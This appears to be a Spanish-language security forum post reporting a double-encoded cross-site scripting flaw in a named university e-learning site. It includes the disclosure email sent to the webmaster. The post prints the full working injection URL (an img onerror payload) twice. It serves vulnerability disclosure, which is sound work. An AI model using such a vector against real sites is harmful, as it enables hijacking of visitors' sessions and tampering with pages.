(http://i50.tinypic.com/28ltnch.png)
XSS Double Encode
Web: http://www.sceu.frba.utn.edu.ar/
Vector: http://www.sceu.frba.utn.edu.ar/e-learning/component/search/?searchword=%2522%253E%253Cimg%2520src%3D.%2520onerror%3Dalert%28/HD_Breaker/%29%253E%253C!--
Reportado: No
Reportado!
CitarEstimado webmaster,
Pertenezco a un grupo llamado Underc0de Research Security, y nos dedicamos a encontrar fallas de seguridad, reportarlas y brindamos soporte para ayudar a solucionarlas.
El dia de hoy, el usuario HD_Breaker notifico una falla en el sitio: sceu.frba.utn.edu.ar se trata de un XSS. El vector para reproducirlo es el siguiente:
http://www.sceu.frba.utn.edu.ar/e-learning/component/search/?searchword=%2522%253E%253Cimg%2520src%3D.%2520onerror%3Dalert%28/HD_Breaker/%29%253E%253C!--
Espero que puedan arreglarlo antes de que alguien le saque provecho.
Saludos Cordiales
Underc0de Research Security
Saludos!
Buenisimo y Antrax no me pudo haber ayudado mejor con su comentario :)
Saludos